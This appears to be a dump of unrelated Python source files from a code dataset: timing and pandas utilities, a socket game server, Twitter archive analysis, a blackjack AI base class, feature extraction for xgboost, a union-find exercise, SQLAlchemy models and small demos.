    # Per-thread storage so concurrent threads get independent timers.
    local = threading.local()

    class ExecutionTimeout(Exception):
        """Raised by check() when the allowed duration has elapsed."""
        pass

    @staticmethod
    def start(max_duration=timedelta(seconds=1)):
        """Arm the timer for the current thread with the given budget."""
        timing.local.start_time = timing.datetime.now()
        timing.local.max_duration = max_duration

    @staticmethod
    def check():
        """Raise ExecutionTimeout if the armed budget has been exceeded."""
        if timing.datetime.now() - timing.local.start_time > timing.local.max_duration:
            raise timing.ExecutionTimeout()

    @staticmethod
    def do_work(max_duration=timedelta(seconds=1)):
        """Demo loop: spin until the timeout fires, then return 10.

        The original's ``return 10`` was unreachable (the timeout raised
        out of the loop); catching it makes the documented return value
        real. ``max_duration`` is a new optional parameter (defaulting to
        the original 1 second) so callers can shorten the demo.
        """
        timing.start(max_duration)
        try:
            while True:
                timing.check()
                # do stuff here
        except timing.ExecutionTimeout:
            return 10
def df_islarge(df):
    """Return True when *df* occupies more than 100 MB of memory.

    BUG FIX: the original threshold was ``100*10^6`` where ``^`` is
    bitwise XOR, evaluating to 1006 bytes; the intended threshold is
    100 * 10**6 bytes (100 MB).
    """
    return bool(df.memory_usage().sum() > 100 * 10**6)
def df_describe(df, col_details = True, columns = None):
    """
    Print summary statistics for a DataFrame.

    :param df: pandas DataFrame (a Series is tolerated via the fallback branch)
    :param col_details: when True, also print per-column analysis
    :param columns: optional list of column names to detail; None means all
    """
    try:  # DataFrames have .columns; Series do not.
        print('Number of rows: {:23} \nNumber of columns: {:20} \nDataframe size: {:20} mb'
              .format(len(df), len(df.columns), df.memory_usage().sum()/1000000))
    except AttributeError:  # was a bare except; only missing-.columns is expected
        print('Number of rows: {:23} \nDataframe size: {:20} mb'
              .format(len(df), df.memory_usage().sum()/1000000))
    if df_islarge(df):
        print('Large dataset warning')
    print('head: ')
    print(df.head())
    if col_details:  # was `== True`
        if columns is None:  # was `== None`
            print('columns: ', df.columns.values)
            print(df.describe().T)
            print(df.isnull().sum())
        else:
            for col in columns:
                print('Column: {:20} \nType: {:20} \nMemory usage: {:20}'
                      .format(col, str(df[col].dtype), df[col].memory_usage()/1000000))
                #print(df[col].describe())
                print('Number of nulls: ', df[col].isnull().sum())
#######################################
#count_class_function_calls decorator
from functools import wraps
def callable(o):
    # NOTE(review): shadows the builtin callable(), which does the same
    # job; kept under this name so existing callers keep working.
    return hasattr(o, "__call__")
# Global registry: function __name__ -> number of times it has been called.
call_count = {}

def count_calls(fn):
    """Decorator: count invocations of *fn* in ``call_count`` and time each call.

    The wrapper prints the elapsed wall-clock time after every call and
    returns *fn*'s result unchanged.
    """
    print("decorating")

    @wraps(fn)  # BUG FIX: preserve __name__/__doc__ of the wrapped function
    def new_function(*args, **kwargs):
        import datetime
        print("starting timer")
        before = datetime.datetime.now()
        print(fn.__name__)
        # Increment (or create) the counter for this function name.
        call_count[fn.__name__] = call_count.get(fn.__name__, 0) + 1
        print(call_count)
        result = fn(*args, **kwargs)
        after = datetime.datetime.now()
        print("Elapsed Time: {0}".format(after - before))
        return result
    return new_function
def count_class_function_calls(cls):
    """
    Class decorator: counts and times each occasion a function is run in a class.

    Wraps *cls* in a proxy class whose attribute access intercepts
    instance-method lookups and applies ``count_calls`` to them on the fly.
    NOTE(review): the proxy replaces the class, so ``__name__`` and
    isinstance checks refer to ``NewCls``, not the original class.
    """
    class NewCls(object):
        def __init__(self,*args,**kwargs):
            # Hold the real instance; all attribute access is delegated to it.
            self.oInstance = cls(*args,**kwargs)
        def __getattribute__(self,s):
            """
            called whenever any attribute of a NewCls object is accessed.
            This function first tries to get the attribute off NewCls. If it fails then it tries to fetch the attribute from self.oInstance (an
            instance of the decorated class). If it manages to fetch the attribute from self.oInstance, and
            the attribute is an instance method then `count_calls` is applied.
            """
            try:
                x = super(NewCls,self).__getattribute__(s)
            except AttributeError:
                pass
            else:
                return x
            x = self.oInstance.__getattribute__(s)
            # Bound-method detection: compare against the type of a known
            # bound method (self.__init__).
            if type(x) == type(self.__init__): # it is an instance method
                return count_calls(x)
            else:
                return x
    return NewCls
if __name__ == '__main__':
    # Demo: wrap a class so every method access is counted and timed.
    @count_class_function_calls
    class test_class():
        def __init__(self, a):
            self.x = 5
            self.a = a
        #@count_calls
        def fn(self):
            print("ran fn")
            return 2
        def b(self): return self.a
    my_class = test_class(5)
    print(my_class.fn())
    print(my_class.a)
    print(my_class.b())
    # NOTE(review): prints "NewCls", not "test_class" -- the decorator
    # replaces the class and does not copy __name__ over.
    print(test_class.__name__)
|
992,124 | 7ed6b06464645ddd5c4ee98952e8746b16cbc691 | import requests
# Smoke-test the locally-running stock API: fetch data for ticker DOCU
# and dump the JSON response.
r = requests.get('http://0.0.0.0:8000/get_stock/DOCU')
print(r.json())
|
992,125 | 9672eecf7143e7926a2ef2617dae4e58b70b3b78 | import sys
# Marathon checkpoint validator: the runner starts at 0 m and the finish
# is at 42195 m, with four user-entered intermediate checkpoints.
# Each checkpoint must be strictly past the previous one (otherwise the
# input is invalid); a leg is credited to the running total only when it
# is at most 10000 m.  If the credited legs do not add up to the full
# distance, Marquinhos "does not finish".
p1 = 0           # start position
p6 = 42195       # finish position (marathon distance in metres)
somatoria = 0    # sum of credited legs
msg1 = "Marquinhos termina a prova"
msg2 = "Marquinhos nao termina"
msg3 = "Valor invalido"
p2 = int(input("posicao 2: "))
if p2 <= p1:
    # Checkpoints must be strictly increasing.
    print(msg3)
    sys.exit()
else:
    d = p2 - p1
    if d <= 10000:
        somatoria = somatoria + d
p3 = int(input("posicao 3: "))
if p3 <= p2:
    print(msg3)
    sys.exit()
else:
    d = p3 - p2
    if d <= 10000:
        somatoria = somatoria + d
p4 = int(input("posicao 4 : "))
if p4 <= p3:
    print(msg3)
    sys.exit()
else:
    d = p4 - p3
    if d <= 10000:
        somatoria = somatoria + d
p5 = int(input("posicao 5 : "))
if p5 <= p4:
    print(msg3)
    sys.exit()
else:
    d = p5 - p4
    if d <= 10000:
        somatoria = somatoria + d
# Final leg to the finish line is always credited (no 10000 m cap here).
d = p6 - p5
somatoria = somatoria + d
if somatoria != p6:
    print(msg2)
else:
    print(msg1)
992,126 | 1de95c6d05f07a5b3a08a9c71e977ae340e26cf1 | import os
class Config:
    """Application settings resolved from environment variables at construction."""

    def __init__(self):
        env = os.getenv
        self.SQLALCHEMY_DB_URI = env("SQLALCHEMY_DB_URI", "sqlite:////data/db/tools.db")
        self.SQLALCHEMY_ECHO = env("SQLALCHEMY_ECHO") == "True"
        self.DEBUG = env("DEBUG") == "True"
        self.SENTRY_DSN = env("SENTRY_DSN", "")
        # Global values exposed to the Flask app / templates.
        self.FLASK_CONFIG = {
            "SITE_NAME": env("SITE_NAME", "Kindle Highlights/Notes Export"),
            "SITE_SLOGAN": env("SITE_SLOGAN", "Export your kindle highlights/notes(导出你的Kindle笔记)"),
            "GA_CODE": env("GA_CODE"),  # Google Analytics Code
            "DISABLE_AD": env("DISABLE_AD") == "True",
        }
config = Config()
|
992,127 | b2707e621a7d6dcdeea42654cd713f24f56ff162 | import socket
from _thread import *
# Bind address/port for the game server; "ip_address" is a placeholder the
# deployer must replace with the host's real address.
server = "ip_address"
port = 5555
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.bind((server,port))
except socket.error as e :
    # Bind failures (port in use, bad address) are only reported, not fatal;
    # s.listen() below will then fail on the unbound socket.
    print(str(e))
s.listen()
print("Server Initialized....\n\nWaiting FOr Connections..\n")
def readpos(str):
    """Parse an "x,y" wire string into an (int, int) position tuple."""
    # NOTE: the parameter name shadows the builtin str (kept for interface
    # compatibility); any fields beyond the first two are ignored.
    fields = str.split(",")
    return int(fields[0]), int(fields[1])
def makepos(tup):
    """Serialize an (x, y) position tuple into the "x,y" wire format."""
    return "{0},{1}".format(tup[0], tup[1])
pos = [(0,0),(400,0)]
def thread_1(conn,player):
    """Per-client handler: store this client's position and relay the other's.

    :param conn: accepted socket for this client
    :param player: index (0 or 1) into the shared global ``pos`` list
    """
    # Send the client its assigned starting position first.
    conn.send(str.encode(makepos(pos[player])))
    reply = ""
    while True:
        try:
            data = readpos(conn.recv(2048).decode())
            pos[player] = data
            # NOTE(review): readpos always returns a 2-tuple, so this branch
            # can never fire; disconnects actually surface as parse errors on
            # an empty recv and are caught by the except below.
            if len(data) < 1:
                print("Discoonected from ",addr)
                break
            else:
                # Reply with the *other* player's latest position.
                if player == 1 :
                    reply = pos[0]
                else:
                    reply = pos[1]
                print("Recieved: ",data)
                print("Sending: ",reply)
                conn.sendall(str.encode(makepos(reply)))
        except:
            # Any socket/parse failure ends this client's session.
            print("Error")
            break
    print("Disconnected..\nWaiting FOr New Connection..")
    conn.close()
# Accept loop: hand each new connection to its own thread with a player slot.
currentPlayer = 0
while True:
    conn, addr = s.accept()
    print(f"Connection Established with {addr}.. \nWaiting for data... ")
    start_new_thread(thread_1, (conn, currentPlayer))
    # BUG FIX: was `currentPlayer =+ 1` (assigns +1), which pinned every
    # client after the first to player slot 1; increment instead.
    # NOTE(review): `pos` only has two slots, so a third connection would
    # index out of range inside thread_1 -- confirm the intended player cap.
    currentPlayer += 1
|
992,128 | 7fbf90d8d17d2de65a55409d85a78818ba0dbc87 | import json
#open twitter data
with open('/Users/maddie/Desktop/twitter-2020-02-11-a78b07526621ffada3b98a8686afc07c4602cbde62e511b321765432f525f2e7/tweet.js', 'r') as f:
data = json.loads(f.read())
"""
extract from the data:
1. percentage of my tweets which were retweets of other users content
2. percentage of my tweets which had engagement
3. hashtags from the tweets with engagment
4. time of day of tweets with engagement
5. no of tweets each day of the week
6. no of tweets each month
"""
#set up variables, lists and dictionaries
totaltweets = len(data)
retweettotal = 0
engagementtotal = 0
hashtags = []
tweetseachday = dict ()
tweetseachmonth = dict()
timeoftweetswithengagment = dict ()
tweettime = dict()
dayoftweetwithengagment = dict ()
#extract from the JSON data
for i in range(0,totaltweets):
#percentage retweets from other users
if "RT" in data[i]["tweet"]["full_text"]:
retweettotal += 1
#day tweets were made
if(data[i]["tweet"]["created_at"][0:3]) not in tweetseachday:
tweetseachday[data[i]["tweet"]["created_at"][0:3]] = 1
else:
tweetseachday[data[i]["tweet"]["created_at"][0:3]] += 1
#month tweets were made
if(data[i]["tweet"]["created_at"][3:7]) not in tweetseachmonth:
tweetseachmonth[data[i]["tweet"]["created_at"][3:7]] = 1
else:
tweetseachmonth[data[i]["tweet"]["created_at"][3:7]] += 1
#hour tweets were made
if(data[i]["tweet"]["created_at"][11:13]) not in tweettime:
tweettime[data[i]["tweet"]["created_at"][11:13]] = 1
else:
tweettime[data[i]["tweet"]["created_at"][11:13]] += 1
#percentage with engagment, the hashtags used and time of day the tweet was made
if data[i]["tweet"]["retweet_count"] != "0" or data[i]["tweet"]["favorite_count"] != "0":
engagementtotal += 1
if len(data[i]["tweet"]["entities"]["hashtags"]) > 0:
for j in range(0, len(data[i]["tweet"]["entities"]["hashtags"])):
hashtags.append(data[i]["tweet"]["entities"]["hashtags"][j]["text"])
if data[i]["tweet"]["created_at"][11:13] not in timeoftweetswithengagment:
timeoftweetswithengagment[data[i]["tweet"]["created_at"][11:13]] = 1
else:
timeoftweetswithengagment[data[i]["tweet"]["created_at"][11:13]] += 1
if(data[i]["tweet"]["created_at"][0:3]) not in dayoftweetwithengagment:
dayoftweetwithengagment[data[i]["tweet"]["created_at"][0:3]] = 1
else:
dayoftweetwithengagment[data[i]["tweet"]["created_at"][0:3]] += 1
retweetpercentage = round(retweettotal/totaltweets*100, 2)
engagmentpercentage = round(engagementtotal/totaltweets*100, 2)
|
992,129 | c8820ec3e606b6b65253606ac4eff08026d3c036 | from copy import deepcopy
from abc import ABC, abstractmethod
from ..models import Dealer, PlayerAction
from ..game_controller import *
class BaseAI(ABC):
    """
    The abstract base class of all AI classes.

    Subclasses implement the two decision hooks (bet sizing and in-round
    action); play_game() drives complete blackjack games against the
    configured dealer via the game_controller functions and records every
    (state snapshot, decision, money outcome) for later analysis/training.
    """
    def __init__(self, dealer_id, total_money):
        self.dealer_id = dealer_id
        self.initiate_state(dealer_id, total_money)
        self._add_dealer_rules()
        # Stop the game once the shoe runs this low instead of reshuffling.
        self.min_cards_in_deck = 20
    def initiate_state(self, dealer_id, total_money):
        """Reset self.state to a fresh pre-game blackjack state dict."""
        self.state = {
            "dealer_id": dealer_id,
            "deck": [],
            "dealer_cards": [],
            "player_cards": [[]],
            "hole_card": "",
            "current_hand": "",
            "hand_finished": [],
            "hand_is_doubled": [],
            "is_split_valid": False,
            "is_double_valid": False,
            "is_surrender_valid": False,
            "is_insurance_valid": False,
            "did_split_aces": False,
            "did_buy_insurance": False,
            "total_money": total_money,
            "bet_amount": 0,
            "is_in_game": False,
            "is_in_round": False,
            "dealer_message": "",
            "messages": [""],
        }
    def _add_dealer_rules(self):
        """Merge the dealer's house rules (looked up in the DB) into the state."""
        dealer = Dealer.objects.get(id=self.state["dealer_id"])
        self.state.update(dealer.get_rules_dict())
    def _get_valid_actions(self):
        """Return the PlayerActions currently legal according to the state flags."""
        actions = [PlayerAction.hit, PlayerAction.stand]
        if self.state["is_split_valid"]:
            actions.append(PlayerAction.split)
        if self.state["is_double_valid"]:
            actions.append(PlayerAction.double)
        if self.state["is_surrender_valid"]:
            actions.append(PlayerAction.surrender)
        if self.state["is_insurance_valid"]:
            actions.append(PlayerAction.buy_insurance)
        return actions
    def play_game(self):
        """Play rounds until the AI is broke or the deck runs low.

        :return: (all_bet_states, all_action_states); each entry pairs a
            deep-copied state snapshot with the decision taken and the
            round's money outcome.
        """
        self.state["is_in_game"] = True
        all_bet_states = []
        all_action_states = []
        if self.state["deck"] == []:
            self.state["deck"] = start_game(self.state["dealer_id"])["deck"]
        while self.state["is_in_game"]:
            # Track the bankroll before the round to compute the outcome later.
            initial_money = self.state["total_money"]
            self.state = start_round(
                state=self.state,
                bet_amount=self.decide_bet_amount(),
            )
            bet_state = {
                "state": deepcopy(self.state),
                "bet_amount": self.state["bet_amount"],
            }
            action_states = []
            while self.state["is_in_round"]:
                # Ask the subclass for a move and apply it via the controller.
                action = self.decide_action(valid_actions=self._get_valid_actions())
                action_states.append({
                    "state": deepcopy(self.state),
                    "action": action,
                })
                if action == PlayerAction.hit:
                    self.state = player_hit(self.state)
                elif action == PlayerAction.stand:
                    self.state = player_stand(self.state)
                elif action == PlayerAction.double:
                    self.state = player_double(self.state)
                elif action == PlayerAction.split:
                    self.state = player_split(self.state)
                elif action == PlayerAction.surrender:
                    self.state = player_surrender(self.state)
                elif action == PlayerAction.buy_insurance:
                    self.state = player_buy_insurance(self.state)
                else:
                    raise Exception("Unexpected player action")
            if self.state["total_money"] == 0 or len(self.state["deck"]) < self.min_cards_in_deck:
                self.state["is_in_game"] = False
            # Add outcome to state
            outcome = self.state["total_money"] - initial_money
            bet_state["outcome"] = outcome
            for action_state in action_states:
                action_state["outcome"] = outcome
            # Remove hidden or irrelevant fields from states
            to_remove = ["dealer_id", "deck", "hole_card", "dealer_message", "messages"]
            for field in to_remove:
                bet_state["state"].pop(field)
                for action_state in action_states:
                    action_state["state"].pop(field)
            # Store state in memory
            all_bet_states.append(bet_state)
            all_action_states.extend(action_states)
        return all_bet_states, all_action_states
    @abstractmethod
    def decide_bet_amount(self):
        """Return the amount to bet for the next round (subclass decision)."""
        return None
    @abstractmethod
    def decide_action(self, valid_actions):
        """Return one of *valid_actions* for the current hand (subclass decision)."""
        return None
|
992,130 | a439f7b1da6fced7c66884f02c697326cbc289b2 | #!/usr/bin/python
#_*_coding:utf-8_*_
import sys
def load_users_jobroles_and_studyFields(file):
userBasicFeature = dict()
userJobrole = dict()
userStudyField = dict()
with open(file, "r") as fin:
for line in fin:
segs = line.strip().split(" ")
user = segs[0]
jobroles = []
studyFields = []
if segs[-2] != 'NULL':
jobroles = segs[-2].split(",")
if segs[-1] != 'NULL':
styduFields = segs[-1].split(",")
userJobrole[user] = set(jobroles)
userStudyField[user] = set(studyFields)
userBasicFeature[user] = ' '.join(segs[1:88])
return userJobrole, userStudyField, userBasicFeature
def load_items_titles_and_tags(file):
itemTitle = dict()
itemStudyField = dict()
itemBasicFeature = dict()
with open(file, "r") as fin:
for line in fin:
segs = line.strip().split(" ")
item = segs[0]
titles = []
tags = []
if segs[-4] != "NULL":
titles = segs[-4].strip().split(",")
if segs[-3] != "NULL":
tags = segs[-3].strip().split(",")
itemTitle[item] = set(titles)
itemStudyField[item] = set(tags)
itemBasicFeature[item] = ' '.join(segs[1:82])
return itemTitle, itemStudyField, itemBasicFeature
def load_user_item_pairs(file):
pairs = []
with open(file, "r") as fin:
for line in fin:
segs = line.strip().split()
if len(segs) >= 3:
pairs.append((segs[0], segs[1], segs[2]))
else:
pairs.append((segs[0], segs[1]))
return pairs
def get_interaction_and_jaccard(set1, set2):
    """Return "<has-any> <intersection-size> <jaccard>" as a string.

    When both sets are empty the sentinel "0 0 0" is returned; otherwise the
    first field is "1" followed by the intersection size and the Jaccard
    similarity (intersection / union).
    """
    if not set1 and not set2:
        return "0 0 0"
    inter = float(len(set1 & set2))
    union = float(len(set1 | set2))
    return "1 " + str(inter) + " " + str(inter / union)
def get_xgboost_input(line):
    """Convert a dense feature row to sparse 1-based "index:value" format.

    Zero-valued features ('0'/'0.0') are dropped; 'NULL' becomes -1.
    """
    tokens = line.strip().split()
    pieces = []
    for idx, tok in enumerate(tokens, start=1):
        if tok == '0' or tok == '0.0':
            continue
        pieces.append(str(idx) + ":" + ('-1' if tok == 'NULL' else tok))
    return " ".join(pieces)
if __name__ == "__main__":
    # CLI contract: exactly four positional arguments (Python 2 script).
    if len(sys.argv) != 5:
        print "Usage:"
        print "python get_word_interaction.py basic_users_features_file basic_items_features_file user_item_pairs_file output_file"
        sys.exit(0)
    user_feature_file = sys.argv[1]
    item_feature_file = sys.argv[2]
    user_item_file = sys.argv[3]
    output_file = sys.argv[4]
    # Load user/item side features plus the (user, item[, label]) pairs.
    userJobrole, userStudyField, userBasicFeature = load_users_jobroles_and_studyFields(user_feature_file)
    itemTitle, itemTag, itemBasicFeature = load_items_titles_and_tags(item_feature_file)
    userItemPairs = load_user_item_pairs(user_item_file)
    with open(output_file, "w") as fout:
        line = ""
        print len(userItemPairs)
        counter = 0
        for pair in userItemPairs:
            counter += 1
            # Dense side features first, then set-overlap features for each
            # (jobrole/studyField) x (title/tag) combination.
            line = userBasicFeature[pair[0]] + " " + itemBasicFeature[pair[1]]
            jobroles = userJobrole[pair[0]]
            studyFields = userStudyField[pair[0]]
            titles = itemTitle[pair[1]]
            tags = itemTag[pair[1]]
            line += " " + get_interaction_and_jaccard(jobroles, titles)
            line += " " + get_interaction_and_jaccard(jobroles, tags)
            line += " " + get_interaction_and_jaccard(studyFields, titles)
            line += " " + get_interaction_and_jaccard(studyFields, tags)
            # Labelled pairs (training data) keep the label as first column.
            if len(pair) >= 3:
                fout.write(pair[2] + " " + get_xgboost_input(line)+"\n")
            else:
                fout.write(get_xgboost_input(line)+"\n")
            # Progress heartbeat every 10k pairs.
            if counter%10000 == 0:
                print counter
    print "finish!"
|
992,131 | a4b78303ba485dd0e85b9357088716f8310e0714 | from collections import defaultdict
class River(object):
    """Disjoint-set (union-find) over `numOfElements` items with union by
    rank and path compression."""

    def __init__(self, numOfElements=100):
        self.rank = [0 for _ in range(numOfElements)]
        self.parents = [0 for _ in range(numOfElements)]
        self.n = numOfElements
        # Bug fix: initialise every element as its own root. Previously the
        # structure was unusable until makeSet() was called manually —
        # union()/find() on a fresh instance silently collapsed everything
        # onto element 0.
        self.makeSet()

    def init(self, numOfElements):
        """Kept for backward compatibility; re-initialises the forest."""
        self.makeSet()

    def makeSet(self):
        """Make every element the root of its own singleton set."""
        for i in range(self.n):
            self.parents[i] = i

    def union(self, x, y):
        """Merge the sets containing x and y (union by rank)."""
        parentX = self.find(x)
        parentY = self.find(y)
        if parentX == parentY:
            return
        if self.rank[parentX] > self.rank[parentY]:
            self.parents[parentY] = parentX
        elif self.rank[parentX] < self.rank[parentY]:
            self.parents[parentX] = parentY
        else:
            self.parents[parentX] = parentY
            self.rank[parentY] += 1

    def find(self, x):
        """Return the root of x's set, compressing the path on the way."""
        if self.parents[x] != x:
            self.parents[x] = self.find(self.parents[x])
        return self.parents[x]
def riverSizes(matrix):
    """Return the sizes of the 4-connected groups of 1s in a binary grid.

    Cells are flattened to ids i*colCount + j and merged with a union-find;
    each root's member count is one river's size.
    """
    if not matrix:
        return []
    rowCount, colCount = len(matrix), len(matrix[0])
    # Bug fixes: size the union-find to the grid (the old default of 100
    # cells crashed on larger grids) and initialise the parent array so
    # union/find actually work on a fresh instance. Also dropped the
    # pointless `global i, j` declaration.
    djs = River(rowCount * colCount)
    djs.makeSet()
    for i in range(rowCount):
        for j in range(colCount):
            if matrix[i][j] == 0:
                continue
            cell = i * colCount + j
            if i + 1 < rowCount and matrix[i + 1][j] == 1:
                djs.union(cell, cell + colCount)
            if i - 1 >= 0 and matrix[i - 1][j] == 1:
                djs.union(cell, cell - colCount)
            if j + 1 < colCount and matrix[i][j + 1] == 1:
                djs.union(cell, cell + 1)
            if j - 1 >= 0 and matrix[i][j - 1] == 1:
                djs.union(cell, cell - 1)
    islands = defaultdict(int)
    for i in range(rowCount):
        for j in range(colCount):
            if matrix[i][j] == 1:
                islands[djs.find(i * colCount + j)] += 1
    return islands.values()
|
992,132 | e9824ab0d47279c78d3029487d9b5c93f8c004f9 | from ._stream import Stream
from ._hoverlabel import Hoverlabel
from plotly.graph_objs.heatmap import hoverlabel
from ._colorbar import ColorBar
from plotly.graph_objs.heatmap import colorbar
|
992,133 | 47e045d634924761b2f6073155b174b1c55666d1 |
#TODO: inheritate from bluecopper base class
class TFT_Experimen(Base):
    """ORM row linking an experiment to the schema it conforms to.

    NOTE(review): no Column here is marked primary_key; SQLAlchemy mappers
    require one — confirm the Base/metadata supplies it.
    """
    __tablename__ = 'tft_experiment'
    exp_id = Column('exp_id', String)
    schema_id = Column('schema_id', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Experiment(exp_id='%s', schema_id='%s')>" % (
            self.exp_id, self.schema_id
        )
#TODO: inheritate from bluecopper base class
class TFT_Experiment_Attribute(Base):
    """Association row: one attribute value (property) attached to an experiment."""
    __tablename__ = 'tft_experiment_attributes'
    exp_id = Column('exp_id', String)
    attr_name_id = Column('attr_name_id', String)
    property_id = Column('property_id', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Experiment_Attributes(exp_id='%s', attr_name_id='%s', property_id='%s')>" % (
            self.exp_id, self.attr_name_id, self.property_id
        )
#TODO: inheritate from bluecopper base class
class TFT_Attribute_Name(Base):
    """Lookup row mapping an attribute id to its human-readable name."""
    __tablename__ = 'tft_attribute_names'
    attr_name_id = Column('attr_name_id', String)
    attr_name = Column('attr_name', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Attribute_Names(attr_name_id='%s', attr_name='%s')>" % (
            self.attr_name_id, self.attr_name
        )
#TODO: inheritate from bluecopper base class
class TFT_Schema_Att(Base):
    """Schema membership row: which attribute belongs to a schema, plus its
    role flags (required / group / identifier / annotation), all stored as
    strings."""
    __tablename__ = 'tft_schema_attr'
    schema_id = Column('schema_id', String)
    schema_name = Column('schema_name', String)
    attr_name_id = Column('attr_name_id', String)
    attr_is_required = Column('attr_is_required', String)
    attr_is_group = Column('attr_is_group', String)
    attr_is_identifier = Column('attr_is_identifier', String)
    attr_is_annotation = Column('attr_is_annotation', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Schema_Attr(schema_id='%s', schema_name='%s', attr_name_id='%s', attr_is_required='%s', attr_is_group='%s', attr_is_identifier='%s', attr_is_annotation='%s')>" % (
            self.schema_id, self.schema_name, self.attr_name_id, self.attr_is_required, self.attr_is_group, self.attr_is_identifier, self.attr_is_annotation
        )
#TODO: inheritate from bluecopper base class
class TFT_Identifier_Sourc(Base):
    """Source URL for an identifier-type attribute."""
    __tablename__ = 'tft_identifier_source'
    attr_name_id = Column('attr_name_id', String)
    attr_url = Column('attr_url', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Identifier_Source(attr_name_id='%s', attr_url='%s')>" % (
            self.attr_name_id, self.attr_url
        )
#TODO: inheritate from bluecopper base class
class TFT_Experiment_Ru(Base):
    """Association row: a run belonging to an experiment."""
    __tablename__ = 'tft_experiment_run'
    run_id = Column('run_id', String)
    exp_id = Column('exp_id', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Experiment_Run(run_id='%s', exp_id='%s')>" % (
            self.run_id, self.exp_id
        )
#TODO: inheritate from bluecopper base class
class TFT_Run_Sampl(Base):
    """Association row: a sample used in a run."""
    __tablename__ = 'tft_run_sample'
    run_id = Column('run_id', String)
    sample_id = Column('sample_id', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Run_Sample(run_id='%s', sample_id='%s')>" % (
            self.run_id, self.sample_id
        )
#TODO: inheritate from bluecopper base class
class TFT_Exp_Analysi(Base):
    """Association row: an analysis attached to an experiment."""
    __tablename__ = 'tft_exp_analysis'
    exp_id = Column('exp_id', String)
    analysis_id = Column('analysis_id', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Exp_Analysis(exp_id='%s', analysis_id='%s')>" % (
            self.exp_id, self.analysis_id
        )
#TODO: inheritate from bluecopper base class
class TFT_Sample_Attribute(Base):
    """Attribute value attached to a sample."""
    __tablename__ = 'tft_sample_attributes'
    sample_id = Column('sample_id', String)
    attr_name_id = Column('attr_name_id', String)
    attr_value_id = Column('attr_value_id', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Sample_Attributes(sample_id='%s', attr_name_id='%s', attr_value_id='%s')>" % (
            self.sample_id, self.attr_name_id, self.attr_value_id
        )
#TODO: inheritate from bluecopper base class
class TFT_Analysis_Comparison(Base):
    """Association row: a comparison used by an analysis."""
    __tablename__ = 'tft_analysis_comparisons'
    analysis_id = Column('analysis_id', String)
    comparison_id = Column('comparison_id', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Analysis_Comparisons(analysis_id='%s', comparison_id='%s')>" % (
            self.analysis_id, self.comparison_id
        )
#TODO: inheritate from bluecopper base class
class TFT_Property_Relation(Base):
    """Parent/child edge between two property values."""
    __tablename__ = 'tft_property_relations'
    relation_id = Column('relation_id', String)
    parent_prop = Column('parent_prop', String)
    child_prop = Column('child_prop', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Property_Relations(relation_id='%s', parent_prop='%s', child_prop='%s')>" % (
            self.relation_id, self.parent_prop, self.child_prop
        )
#TODO: inheritate from bluecopper base class
class TFT_Comparison(Base):
    """A named contrast between two attribute values (sides a and b)."""
    __tablename__ = 'tft_comparisons'
    comparison_id = Column('comparison_id', String)
    attr_value_id_a = Column('attr_value_id_a', String)
    attr_value_id_b = Column('attr_value_id_b', String)
    contrast = Column('contrast', String)
    comparison_name = Column('comparison_name', String)
    # @validates()
    def __repr__ (self):
        return "<TFT_Comparisons(comparison_id='%s', attr_value_id_a='%s', attr_value_id_b='%s', contrast='%s', comparison_name='%s')>" % (
            self.comparison_id, self.attr_value_id_a, self.attr_value_id_b, self.contrast, self.comparison_name
        )
#TODO: inheritate from bluecopper base class
# NOTE(review): the file originally ended with a nameless definition
# (`class (Base):` containing only `__tablename__ = ''`), which is a
# SyntaxError and made the whole module unimportable. The unfinished stub is
# preserved below as a comment until it is given a real name and columns.
# class TFT_Placeholder(Base):
#     __tablename__ = ''
|
992,134 | f0c19a53683b0e8779713748b3beac6d9925575d | from socket import *
# Minimal UDP "uppercase echo" server: every datagram received is sent back
# to its sender upper-cased.
server_port = 12000
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.bind(("localhost", server_port))
print(f"* Server started at port {server_port}")

while True:
    payload, client_address = server_socket.recvfrom(2048)
    print(client_address, payload.decode())
    server_socket.sendto(payload.upper(), client_address)
|
992,135 | 1165693ee6a0049a5c2b1a2639e153056abed6b7 | import shlex
import subprocess
def exec_command(cmd: str):
    """Run *cmd* (a shell-style command string) and return its stdout as str.

    The string is tokenised with shlex (quoting works, no shell is spawned).
    Uses subprocess.run so the child process is always waited on and reaped —
    the original Popen variant never joined the child, leaking a zombie and
    the pipe handle.
    """
    command = shlex.split(cmd)
    result = subprocess.run(command, stdout=subprocess.PIPE,
                            universal_newlines=True)
    return result.stdout
def query_number_gpus():
    """Count installed GPUs by parsing `nvidia-smi` CSV output.

    The CSV has one header row and the captured text ends with a newline,
    hence the two subtracted lines.
    """
    csv_out = exec_command('nvidia-smi --query-gpu=gpu_name,gpu_bus_id,vbios_version --format=csv')
    lines = csv_out.split('\n')
    return len(lines) - 2  # minus header, minus last new line
|
992,136 | f04bf1eb2b87e257386e6bfef4ea3ce7b5203fe1 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: alfred_yuan
# Created on 2019-01-28
import threading
import time
class Box(object):
    """Thread-safe item counter guarded by one class-level re-entrant lock.

    The RLock allows add()/remove() to hold the lock and still call
    execute(), which acquires it again on the same thread.
    """

    lock = threading.RLock()

    def __init__(self):
        self.total_items = 0

    def execute(self, n):
        """Atomically add n (may be negative) to the item count."""
        # `with` guarantees release even if the update raises, unlike the
        # original bare acquire()/release() pair.
        with Box.lock:
            self.total_items += n

    def add(self):
        """Atomically add one item."""
        with Box.lock:
            self.execute(1)

    def remove(self):
        """Atomically remove one item."""
        with Box.lock:
            self.execute(-1)
## these two functions run in separate
## threads and call the Box's methods
def adder(box, items):
    """Add `items` items to `box`, announcing each one and pausing 1s."""
    remaining = items
    while remaining > 0:
        print("add 1 item in the box")
        box.add()
        time.sleep(1)
        remaining -= 1
def remove(box, items):
    """Remove `items` items from `box`, announcing each one and pausing 1s."""
    remaining = items
    while remaining > 0:
        print("remove 1 item in the box")
        box.remove()
        time.sleep(1)
        remaining -= 1
